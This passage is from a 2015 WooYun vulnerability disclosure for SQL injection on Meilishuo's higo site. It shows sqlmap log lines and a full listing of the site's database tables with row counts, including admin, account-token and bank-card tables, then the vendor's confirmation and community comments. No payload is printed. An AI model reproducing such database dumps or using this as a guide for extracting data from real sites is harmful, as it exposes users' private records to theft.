[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 138
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 734054
[08:12:46] [INFO] resumed: 402593
[08:12:46] [INFO] resumed: 271362
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 17
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 181
[08:12:46] [INFO] resumed: 2270
[08:12:46] [INFO] resumed: 1019
[08:12:46] [INFO] resumed: 1126
[08:12:46] [INFO] resumed: 906
[08:12:46] [INFO] resumed: 2555
[08:12:46] [INFO] resumed: 140
[08:12:46] [INFO] resumed: 895
[08:12:46] [INFO] resumed: 2
[08:12:46] [INFO] resumed: 40011
[08:12:46] [INFO] resumed: 5
[08:12:46] [INFO] resumed: 56463
[08:12:46] [INFO] resumed: 4200
[08:12:46] [INFO] resumed: 1090107
[08:12:46] [INFO] resumed: 282
[08:12:46] [INFO] resumed: 2112
[08:12:46] [INFO] resumed: 92
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 826
[08:12:46] [INFO] resumed: 1241
[08:12:46] [INFO] resumed: 41
[08:12:46] [INFO] resumed: 102
[08:12:46] [INFO] resumed: 3
[08:12:46] [INFO] resumed: 0
[08:12:46] [INFO] resumed: 3
[08:12:46] [INFO] resumed: 606
[08:12:46] [INFO] resumed: 3
[08:12:46] [INFO] resumed: 2428
[08:12:46] [INFO] resumed: 139857
[08:12:46] [INFO] resumed: 15
[08:12:46] [INFO] resumed: 2271
[08:12:46] [INFO] resumed: 39
[08:12:46] [INFO] resumed: 55
[08:12:46] [INFO] resumed: 686
[08:12:46] [INFO] resumed: 11901
[08:12:46] [INFO] resumed: 10
[08:12:46] [INFO] resumed: 85876
[08:12:46] [INFO] resumed: 17
Database: higo
+------------------------------------+---------+
| Table                              | Entries |
+------------------------------------+---------+
| t_pandora_favorite                 | 5783893 |
| t_pandora_statistics               | 4468950 |
| t_pandora_coupon                   | 1090107 |
| t_pandora_xmpp_message             | 734054  |
| t_pandora_image                    | 622056  |
| TBL_ADMIN_LOG                      | 512125  |
| tbl_admin_newlogs                  | 474891  |
| t_pandora_basic_goods_statistics   | 402593  |
| t_pandora_account                  | 273487  |
| t_pandora_account_token            | 271362  |
| t_pandora_buyer                    | 270143  |
| t_pandora_xmpp_users               | 231484  |
| t_pandora_account_connect          | 219037  |
| t_pandora_push_device              | 168262  |
| t_pandora_express_tracking         | 139857  |
| t_pandora_friends                  | 124990  |
| t_pandora_goods_sku                | 85876   |
| t_pandora_search_keywords          | 56463   |
| t_pandora_goods                    | 48382   |
| t_pandora_order_item               | 41737   |
| t_pandora_address                  | 41179   |
| t_pandora_order_pay                | 40011   |
| t_pandora_order_pay_ref            | 39134   |
| t_pandora_pay_receipt_record       | 38882   |
| t_pandora_coupon_collectlog        | 36175   |
| t_pandora_order_express            | 33249   |
| t_pandora_order                    | 33214   |
| t_pandora_order_pay_confirm        | 14648   |
| t_pandora_bill_balance             | 12920   |
| t_pandora_settlement_item          | 11901   |
| t_pandora_order_receivepush        | 10628   |
| t_pandora_report_event_shop_goods  | 9613    |
| t_pandora_syn_goods_img            | 8822    |
| t_pandora_basic_events_statistics  | 5956    |
| t_pandora_brand                    | 5343    |
| t_pandora_syn_goods_sku            | 4342    |
| t_pandora_buyer_recruitment        | 4200    |
| t_pandora_settlement               | 3908    |
| t_pandora_order_operation          | 3678    |
| t_pandora_shop                     | 3396    |
| t_pandora_wap_click_goods          | 2555    |
| t_pandora_shop_show                | 2496    |
| t_pandora_bill_withdraw            | 2484    |
| t_pandora_event_goods              | 2428    |
| t_pandora_invite_simple            | 2271    |
| t_pandora_mls_goods_prop           | 2270    |
| t_pandora_account_group            | 2142    |
| t_pandora_syn_goods                | 2112    |
| t_pandora_weixin_answer_rank       | 2094    |
| t_pandora_temporary_users          | 2001    |
| t_pandora_order_revoke             | 1750    |
| t_pandora_dimension_shop           | 1498    |
| t_pandora_sales_goods              | 1251    |
| t_pandora_product_collocation_data | 1241    |
| t_pandora_mls_goods                | 1136    |
| t_pandora_mls_order                | 1127    |
| t_pandora_mls_higo_order           | 1126    |
| t_pandora_mls_order_freight        | 1126    |
| t_pandora_mls_user_info            | 1126    |
| t_pandora_account_group_notice     | 1019    |
| t_pandora_account_group_expansion  | 1001    |
| p_logs                             | 906     |
| ouid                               | 895     |
| t_pandora_account_bankcard_history | 831     |
| t_pandora_report_event_shop        | 826     |
| t_pandora_buyersdb                 | 795     |
| t_pandora_sales_statistics         | 765     |
| t_pandora_mls_address              | 686     |
| user_no_nick                       | 671     |
| t_pandora_account_bankcard         | 641     |
| t_pandora_coupon_usedlog           | 606     |
| t_pandora_show_tag                 | 450     |
| t_pandora_product_collocation      | 443     |
| push_log                           | 424     |
| t_pandora_events                   | 344     |
| t_pandora_report_log               | 298     |
| TBL_ADMIN_FUNCTION                 | 290     |
| t_pandora_bill_summary             | 282     |
| t_pandora_welfare_log              | 270     |
| t_pandora_top_keywords             | 202     |
| t_pandora_goods_keywords           | 191     |
| t_pandora_country_code             | 186     |
| t_pandora_order_remark             | 181     |
| t_pandora_totalgmv                 | 168     |
| t_pandora_color                    | 140     |
| t_pandora_event_show_goods         | 138     |
| t_pandora_group_keywords           | 135     |
| t_pandora_category_material        | 124     |
| t_pandora_events_expic             | 115     |
| t_pandora_welfare                  | 110     |
| t_pandora_goods_seckill            | 109     |
| t_pandora_coupon_goods             | 102     |
| t_pandora_category_size            | 94      |
| t_pandora_weixin_answer_recommend  | 92      |
| t_pandora_category                 | 89      |
| t_pandora_event_show               | 76      |
| t_pandora_wap_stat                 | 76      |
| t_pandora_eventgmv                 | 73      |
| t_pandora_order_rapid              | 68      |
| t_pandora_final_wap_statistics     | 55      |
| t_pandora_express_company          | 53      |
| t_pandora_group_banner             | 41      |
| t_pandora_silence                  | 41      |
| TBL_ADMINS                         | 39      |
| t_pandora_home_banner              | 33      |
| t_pandora_coupon_statistics        | 32      |
| t_pandora_order_vipsettle          | 27      |
| t_pandora_shop_alliance            | 26      |
| t_pandora_shop_vip                 | 25      |
| t_pandora_material                 | 23      |
| t_pandora_wap_statistics           | 19      |
| t_pandora_brand_goods              | 18      |
| t_pandora_report_event             | 18      |
| t_pandora_order_refund_pay         | 17      |
| t_pandora_shop_change              | 17      |
| t_pandora_bank                     | 15      |
| t_pandora_id_wrapper               | 13      |
| t_pandora_recommend_category       | 11      |
| TBL_ADMIN_FUNCTION_CAT             | 11      |
| t_pandora_dimension                | 10      |
| t_pandora_login_tips               | 10      |
| t_pandora_coupon_batch             | 8       |
| t_pandora_hot_keywords             | 7       |
| t_pandora_currency                 | 6       |
| t_pandora_order_refund             | 6       |
| t_pandora_fairy_log                | 5       |
| t_pandora_sphinx_counter           | 5       |
| t_pandora_goods_tag                | 3       |
| t_pandora_order_return             | 3       |
| t_pandora_order_return_log         | 3       |
| t_pandora_abroad_shop              | 2       |
| t_pandora_goods_limitation         | 2       |
| t_pandora_inviter                  | 2       |
| t_pandora_category_whitelist       | 1       |
| t_pandora_fairy_log_failure        | 1       |
| t_pandora_video                    | 1       |
+------------------------------------+---------+
[08:12:47] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occ
[08:12:47] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\higo.meilishuo.com'

修复方案:

你好,美丽说!

版权声明:转载请注明来源 蛋蛋侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-15 10:54

厂商回复:

非常感谢您对美丽说安全的关注,经验证该漏洞真实存在,已联系业务部门紧急修复。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-15 10:12 | prolog ( 普通白帽子 | Rank:544 漏洞数:107 | 低调求发展)

    最不喜欢动不动就问厂商要礼物的~ 靠! 他实在不给你就使劲提交漏洞!!

  2. 2015-05-15 10:13 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    @撸撸侠 @管管侠 他是谁??? @蛋蛋侠

  3. 2015-05-15 10:26 | 动感超人 ( 实习白帽子 | Rank:42 漏洞数:10 | 小心动感光波)

    三位一体的神技???@撸撸侠@管管侠@蛋蛋侠合体吧,变身丧尸暴龙兽

  4. 2015-05-15 10:46 | 放开那个漏洞,让我来 ( 路人 | Rank:20 漏洞数:2 | 正在尝试加载简介中.........)

    最不喜欢动不动就问厂商要礼物的~ 靠! 他实在不给你就使劲提交漏洞!!

  5. 2015-05-15 11:14 | 管管侠 ( 核心白帽子 | Rank:1368 漏洞数:108 | 休息几日,让你们先装会!!!)

    @’‘Nome 应该还有 疼疼侠 砸砸侠 什么的

  6. 2015-05-15 11:15 | 管管侠 ( 核心白帽子 | Rank:1368 漏洞数:108 | 休息几日,让你们先装会!!!)

    扯扯侠

  7. 2015-05-15 11:33 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    蛋蛋侠的描述是:我只是一个蛋,那么管管侠的描述应该是什么?

  8. 2015-05-15 12:09 | 北丐 ( 普通白帽子 | Rank:104 漏洞数:20 | )

    洞主,他给你礼物没有

  9. 2015-07-14 19:50 | 一只船北街 ( 普通白帽子 | Rank:418 漏洞数:60 | 闭馆研习技术中...)

    Boolean based, 弄出这么多数据,你一定是很“使劲”

  10. 2015-07-16 14:47 | 蛋蛋侠 ( 普通白帽子 | Rank:100 漏洞数:13 | 我是一只蛋)

    @北丐 至今没收到礼物

  11. 2015-07-16 14:50 | 北丐 ( 普通白帽子 | Rank:104 漏洞数:20 | )

    @蛋蛋侠 美丽说坑爹